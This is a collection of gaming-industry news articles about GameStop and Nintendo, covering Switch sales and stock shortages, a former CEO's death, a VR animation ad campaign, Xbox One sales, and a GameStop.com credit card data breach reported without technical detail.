There’s already been a few shock announcements made for the Nintendo Switch games system this year. While many suspected that Crash Bandicoot was coming to the console, no one was ready for the reveal of Super Smash Bros. Other titles like Dark Souls Remastered and even Wolfenstein 2 have provided plenty of surprises for those who recently bought a Switch. And it appears that more shock Nintendo Switch reveals could be on the way. During a recent Gamestop earnings call, CEO Michael Mauler was asked whether the Switch’s impressive attachment rate would continue. Mauler responded by saying that based on what was being planned for 2018, it was possible that this would continue. The strength of the 2018 games line up was touched upon, with a possible tease suggesting that there’s plenty of more news to be announced. “Yeah, I think that’s a fair question with Nintendo. I mean we know kind of what happened with Wii U,” Mauler is quoted as saying. “I’d say this is definitely a whole different platform than we saw in the past. We have visibility to the software. “So last year was a tremendous year for the software, as well as hardware between Zelda and Mario Odyssey and all the games that they had really drove a lot of hardware sales, as well as software. “I think this year when we look at the slate of titles, many of which haven’t been announced yet, this year looks also very, very strong. “So I think, at least, for 2018, we’ll continue to see the strong software slate drive additional installed base on the hardware and increase attach rate. “We don’t have really visibility for 2019 yet, but for 2018 it should play out that way.” A strong software slate in 2018 could be referencing anything, but many fans will be hoping this is pointing to games like the new Pokemon RPG. However, Pokemon is a game that’s already been announced, so there’s also the chance of other big titles being revealed at E3 2018. Nintendo are also well-known for announcing projects during Direct Streaming events, so there’s also the chance something could be announced before the big LA expo. Other big projects that have been linked to the Nintendo Switch console but not announced, includes Call of Duty Black Ops 4. The new title is reportedly being ported to the hybrid console and will be the first COD game available to play on it. The new Spyro the Dragon remastered trilogy has also been linked to a Switch release, among other high profile franchises. A version of FIFA 19 looks likely to arrive on Nintendo Switch, alongside other popular sports games like the NBA 2K series. Then there’s the question of other ports being made for the Switch that haven’t been announced, with possibilities including Injustice 2 and Soul Calibur 6.

Recent GameStop chief executive officer Julian Paul Raines has died due to complications with cancer. The world’s largest gaming retailer confirmed the passing, and Mike Mauler, who stepped into the CEO role in February, issued the following statement:
“We are profoundly sad to learn of the passing of our friend and former chief executive officer, J. Paul Raines. His spirit is woven into the fabric of our company and the entire GameStop family mourns this loss. Paul was a brilliant man and remarkable visionary, as well as a compassionate, caring and inspirational community leader who was beloved by many. Paul cared deeply about his work and his GameStop family, but his greatest love was for his family. Our heartfelt sympathies go out to them and all those whose lives and hearts Paul touched during his journey.”
Raines oversaw GameStop as CEO since June 2010. In November, he took medical leave due to a relapse of the cancer that he first dealt with in 2014. That leave turned into a permanent resignation In February when he officially stepped down from GameStop’s board of directors. At that time, GameStop said that Raines wanted to “focus on his health and family.” Mauler took over as CEO during this transition.
Under Raines, GameStop has spent most of this decade finding ways to incorporate itself into gaming’s new digital ecosystem while simultaneously diversifying the company’s revenue streams. The retailer owns several Spring Mobile and Simply Mac stores focused on mobile phones and Apple products. It also acquired the novelty-product company ThinkGeek and brought its nerdy brand of products into GameStop stores. Similar to how the music industry moved from selling physical media to selling posters and vinyl records to collectors, Raines’ gaming company was preparing for a shift to selling more toys, posters, and other products to fans.
But even as gaming turned digital, GameStop continued to dominate huge chunks of the console gaming market. In 2014, following the release of the Xbox One and PlayStation 4 systems, GameStop confirmed that more than half of all PS4 and Xbox One games were sold through its stores in the United States. The CEO credited the stores and GameStop’s ground-level associates for keeping the company as an important link in the chain for many consumers.
Raines also found ways to get directly involved in digital sales. The retailer used its associates to inform consumers about season passes and downloadable content. The company would then sell that content as a code printed on a card so player could take that home and install it without having to use a credit card. In 2014, over 70 percent of Ubisoft’s season passes were sold at retail stores, and GameStop has tried to corner that market for all publishers.
We are still in the midst of the digital, online-only transition, so GameStop will have to continue evolving. But the company can use the strategy set out by Raines at the start of this decade to do so.

Virtual reality has reached the “trough of despair,” according to FooVR founder Will Smith. The industry is struggling with disparity in the demand for high-quality VR experiences and the relatively small potential customer market for those kinds of products. Both consumers and publishers are in a holding pattern until something changes, but FooVR isn’t waiting. Smith’s company is making moves to leverage its interesting animation technology in other creative spaces while still building content for VR enthusiasts.
FooVR’s efforts to branch out manifested this week in the form of a GameStop advertising campaign for Bungie’s upcoming sci-fi shooter Destiny 2. In a 30-second TV spot, a pair of gamers enter the world of Destiny 2 as low-poly avatars. They move and commentate on the action around them before a voiceover talks about preorder bonuses (a widget that keeps track of your kill count) and ESRB ratings (T for Teen). This is actually the latest in a line of GameStop ads that use machinima, or the art of making films with video games, to sell products.
Here’s an example of that technique from one of GameStop’s Halo 4 spots:
But FooVR is different in that it is faster and provides more creative freedom while significantly cutting the cost compared to traditional animation.
“[GameStop] has done a lot of work with Machinima over the years working on ad campaigns, working with Rooster Teeth and some other folks,” Smith told GamesBeat. “They liked doing those campaigns, but they found that the machinima isn’t flexible enough. They were looking for ways to have more control over the character animation while still injecting characters into a video game.”
It turns out that is exactly the kind of technology that Smith’s team built to produce The Foo Show.
The Foo Show is FooVR’s marquee product. It is a variety/talk show that takes place in a simulated studio. The idea is that Smith will bring on some guests, typically game developers, to interview. At the halfway point of the program, the show will then cut to the equivalent of a location shoot inside the game in question. In the pilot episode, for example, Smith talked to Campo Santo founders Jake Rodkin and Sean Vanaman about their Firewatch adventure from inside the game’s famous watchtower.
And as a viewer of The Foo Show, you don’t just sit back and watch this happen. You put on a headset and join Smith, Rodkin, and Vanaman as they explore, joke around, and interact with the space.
To enable that experience, FooVR did a live recording session where Smith, Rodkin, and Vanaman were all wearing Vive headsets. As they walked around the watchtower, FooVR’s software was recording their movements, their positions, and their audio. The tech then turns all of that data into animation that FooVR can play back during one of its episodes.
But Smith realized early on that this capture technology isn’t just useful for first-person VR content. If his team set up virtual cameras inside the simulated space, they could quickly create animated video for 2D screens as well. And that’s the pitch GameStop wanted to hear.
“Basically, we animate the characters, just like we have with Foo from the beginning, with just a Vive,” said Smith. “We do it all with just the Vive. We put the actors in the Vives. We go in a sound stage in Texas. We line up the background plates that Rooster Teeth shoots using the game engines, we line those up with some different camera controls to re-create the shots, and then we put the guys in. I think it’s the first time anybody’s done anything like this.”
The benefits of this process to a company like GameStop are obvious. Previously, the world’s largest retailer would have to rely on in-game character models and tools to create the machinima for its ads. Alternatively, the company could have put original characters into the games through traditional animation tools. But that’s expensive, and FooVR might make that alternative seem foolishly expensive.
“Traditionally with the cost of animation, it costs about the same to make each frame of animation,” said Smith. “Your costs are relatively fixed, and it all has to do with the amount of time you’re putting on the screen. Because we generate the animation dynamically, the cost of those assets amortizes down the more you use them. It makes sense in an ad campaign situation like this.”
FooVR still has to build the character models for the actors, but it doesn’t need to animate them frame by frame. So it takes less time, which saves a lot of money. But it’s not just about cash. Saving time has its own benefits.
“We go down and shoot all our animation stuff in a one-day shoot for a couple of these spots, usually,” said Smith. “I’m going to Austin at the end of next week, and we’re going to shoot three spots in three days.”
That fast turnaround enables FooVR to provide its clients with options they would never have with standard animation. For example, the software can capture multiple takes without having to worry about the animation not matching. FooVR can then take all of that footage back to the marketing agency for them to participate in the creative process at a point when traditional animation would have locked out any last-minute changes.
FooVR is so fast that it could even enable a client to create topical content that reacts to the real world. Hell, this tech can even do live-action animation.
“We’ve done live,” said Smith. “We’ve done a live pilot. We did a show with Adult Swim featuring Carl from Aqua Teen Hunger Force on Super Bowl Sunday.”
FooVR has a lot of potential in this space, but this shift is has some echoes of the “pivot to video” we see so many online media companies making. I asked Smith about that, and he explained that his team is still producing The Foo Show. Two episodes are rolling out soon as part of a crowdfunded season of content. But he also said that going out and finding partners like GameStop and Adult Swim give his team the opportunity to refine the animation technology. That will feed back into the VR side of the equation.
At the same time, Smith is as passionate about what FooVR can do 2D screens.
“I love animation. I’ve always loved animation,” he said. “I grew up watching the Simpsons and the Flintstones and old Hanna-Barbera stuff.”
And he loves the idea of contributing to that artform.
“If we can give people who want to make animated shows a new tool in their toolkit that lets them do live programming or live-to-tape programming — things that are impossible in a traditional animated format,” Smith said. “I’m all about that.”

Enlarge / Microsoft and Gamestop are hoping strong performance for the upcoming Xbox One X can help “lagging” current performance for Xbox One software.
With Microsoft no longer reporting specific hardware or software shipments for the Xbox One, public market watchers are forced to use tidbits from other sources to try to divine the system’s performance relative to the console competition. GameStop provided one of those tidbits in its latest earnings report, noting that its new and preowned software sales were both hurt by “lagging Xbox One sales.”
The mega-retailer, which has nearly 4,000 stores in the US and 2,000 more internationally, didn’t share specific breakouts for the Xbox One or other consoles, but it did say that new and preowned software sales had declined 3.4 and 7.5 percent, respectively. Microsoft’s “lagging” performance was the only reason for that drop that the retailer shared publicly; GameStop cited the slow sales a number of times in an earnings call yesterday. “In both new and preowned, we’re seeing underperformance in Xbox One versus PS4, which we believe is due to the coming Xbox One X launch,” GameStop CFO Robert Lloyd said in that call.
Yes, this report just reflects sales from one (major) retailer and doesn’t take into account direct software downloads through the Xbox One itself. Still, the “underperformance” can’t be a good sign for an Xbox division that has been falling well behind Sony on the hardware front for years now (though Microsoft has downplayed the importance of that relative race). For current Xbox One owners, poor sales relative to other consoles could continue to impact the presence of third-party exclusives and cross-platform ports on the system, at least at the margins.

Nintendo have revealed that demand has far surpassed their original estimates and they’re now looking to have an install base of around 10m by the end of the current fiscal year.
But while Nintendo strive to boost their production numbers to keep up with supply, Nintendo Switch stock at Gamestop and GAME is still unable to keep up.
A statement from Nintendo to MCVUK explains: “”For Nintendo Switch, our initial plan for the fiscal year ended March 2017 was to ship two million units by the end of March, but we increased production which resulted in shipping 2.74 million units globally.
“For products like Nintendo Switch, it takes time to procure parts and run production, so we perform demand estimates far in advance of launch. Actual demand following the launch of these products surpassed our estimates globally.
“To take advantage of this favorable momentum, we will continue to bolster our manufacturing facilities and strive to increase production in preparation for the Christmas period, which has been factored into our forecast of shipping 10 million units globally by the end of this fiscal year.”
But while increases in production have been promised, There still isn’t enough Nintendo Switch stock at places like Gamestop.
Nintendo have confirmed that they expect more stock to arrive later this month, adding: “We anticipate more stock to arrive in mid-July. Customer orders will be fulfilled in the order they are placed.”
Players in the UK mostly have access to pre order pages for the Nintendo Switch, effectively putting down a deposit so that they can queue for a system.
A message from GAME explains: “At this time we have not received official confirmation of the next stock delivery of this product.
“We are working extremely hard with Nintendo to receive more stock of the Nintendo Switch for customers.
“Until we have our stock delivery confirmed by Nintendo, a placeholder date of TBC has been put onto this product. This can change once the delivery of stock has been confirmed and the status of your order will change accordingly.”
Having called a couple of Gamestop stores across the United States, it appears that many stores are waiting for an email from Nintendo on when they can expect the next shipments to go out.
Fans can still sign up to have their name taken so that they are notified as soon as new stock is available.
One store employee told the Express Online that fans could be waiting as little as a week, or as long as a month before more stock is made available.
It should be noted that this was confirmed at one local store, meaning that the situation could be completely different at another location in the United States.
If you’re a GameStop customer, check your mail. The company just sent out letters to online patrons confirming a suspected payment security breach.
In April, GameStop said they were looking into a possible data breach that might have put customers’ credit card information at risk. Confirming those suspicions, Kotaku reported today that a number of GameStop customers have received letters notifying them that their credit cards may have been stolen.
The company hasn’t released any numbers yet, but anyone who placed an online order with them between August 10, 2016 and February 9, 2017 is at risk. That’s quite a long time and it’s safe to say many people were exposed. Names, addresses and credit card information were compromised and the reports from April speculated that the three-digit security numbers were taken as well.
The company said in a statement to Kotaku, “GameStop identified and addressed a potential security incident that was related to transactions made on GameStop’s website during a specific period of time. GameStop mailed notification letters to customers who made purchases during that time frame advising them of the incident and providing information on steps they can take.”
It hasn’t been a great time for GameStop. Earlier this year, it announced that it would be closing around 150 stores after increases in digital downloads led to sustained drops in the company’s sales. The company formed its own publishing wing last year in order to stay relevant in the increasingly digital gaming world.
This data breach is yet another setback for GameStop and this time, it’s a setback for its customers as well.

While the Nintendo NES Classic Mini is set to become harder to finder, it appears the same can’t be said for Nintendo Switch stock.
The Nintendo Switch Gamestop site has now been updated with a new pre order option for fans who can’t reach one of their physical outlets.
The Nintendo Switch with Gray Joy-Con and Digital Starter Bundle, Ships by April 28 and includes four new titles.
This includes Zelda Breath of the Wild with expansion pass, Snipperclips, Shovel Knight: Treasure Trove and Has Been Heroes.
While the not the cheapest option at $ 444.99, it provides fans in the United States with a solid option, even though they may have to wait until the end of the month for their console.
Unlike last weekend, Toys R Us have not confirmed that all their stores are going to have stock in North America, however, they remain one of the best places to call up and ask.
In the UK, Toys R Us do have confirmed Nintendo Switch stock, although they may not offer at every location.
Logging onto the official website will help you navigate how to grab a console, and they’re not the only option.
The official Nintendo UK site also has stock available, while Amazon are also listing new units which can be pre-purchased.
However, fans may have less luck at Argos this weekend, with the official site currently stating that there is no fresh stock updates.
It follows the news that the Nintendo Switch was the best selling console in the United States for March.
While it was expected to have had a big impact in its first month, new Nintendo Switch sales data revealed today confirms things are going better than expected.
But having hinted at impressive numbers in the past, Nintendo have new confirmed that they sold more than 906,000 units in the US during March.
If you factor in the idea that the Japanese games giant was aiming for 2m units to be produced and ready for launch month, selling half of that in one territory is a good sign.
The Japanese games giant also confirmed in further Nintendo Switch news that the console is now the fastest-selling console in company’s history.
These new numbers are a prelude to the company’s next earnings briefing, which is scheduled for April 27 and will include worldwide numbers.
Nintendo also commented on the problems with Nintendo Switch stock, adding that “shipments have not yet been able to keep up with such high demand,” and that new systems are “continually being shipped.”
According to data from the NPD Group, those numbers put the Nintendo Switch out ahead of both Sony’s PS4 and Microsoft’s Xbox One.
It follows news that the Nintendo Classic NES Mini is being discontinued, although the same hasn’t been confirmed for the UK, as of yet.
A recently released statement from Nintendo only mentions North America, and also says that shipments are stopping for this year.
This suggests that the Nintendo Classic Mini NES could return in the future.
It’s also possible that UK and European shipments could continue after April, but it seems unlikely.
Express Online has contacted Nintendo for clarification about the status of the Nintendo Classic Mini NES in the UK, and will update the article when we have more information.
Hopefully Nintendo will move on to the SNES Mini Classic, and actually produce enough units to satisfy demand.
The only places you’re guaranteed to find the NES Mini right now is on eBay, at CEX or via Amazon third-party sellers. Unfortunately, however, prices have been greatly inflated.

If you’ve shopped at GameStop.com between mid-September and early February, it’s possible your credit card information has been compromised according to a report by the web security blog, KrebsOnSecurity.
After reaching out to the video game retailer about the breach, GameStop confirmed to KrebsOnSecurity that it had been notified by a third party that possible payment card data used for purchases on the company’s internet storefront were being sold on another website.
“That day a leading security firm was engaged to investigate these claims. Gamestop has and will continue to work non-stop to address this report and take appropriate measures to eradicate any issue that may be identified,” the company said in its statement to Krebs.
Krebs is also reporting that CVV2s, the three-digit security codes on the backs of credit cards, are among the information that was stolen in addition to credit card numbers, expiration dates, and addresses. CVV2 information isn’t supposed to be stored by online stores, but hackers can use malicious software to copy the data before it’s encrypted and processed.
“We regret any concern this situation may cause for our customers,” GameStop said in its statement to Krebs. “GameStop would like to remind its customers that it is always advisable to monitor payment card account statements for unauthorized charges.”
GameStop has not yet responded to a request for comment.
